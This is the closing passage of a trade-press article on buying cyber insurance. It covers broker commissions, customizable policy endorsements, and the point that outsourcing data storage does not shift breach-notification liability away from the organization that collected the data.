On the broker issue, Haase says, “This is a complex purchase and you need a professional helping you. Most policies are highly customizable, and there are a lot of endorsements — some of which may not even drive up the price — that can be requested if you know what to ask for. For instance, you might add coverage for paper files, both on-site and off.”

Typically the buyer goes to their local agent, and the local agent uses a specialist, Haase says. Both the local agent and the specialist get commissions ranging from 7.5% to 10%, so that 15% to 20% of the premium goes to commissions.

Finally, Merrill cautions that cyber insurance buyers must understand that if they are outsourcing their data handling, they are not at the same time outsourcing their liability if there is a data breach. The onus of the various breach notification laws is on the organization that gathered the data, not on the organization that was storing it when it was exposed, he notes.

“Cyber insurance is not there to replace sound risk management,” Merrill says. “It is there to supplement it.”

Wood is a freelance technology writer in Texas. He can be reached at lwood@texas.net.

Source: TechWorld Australia
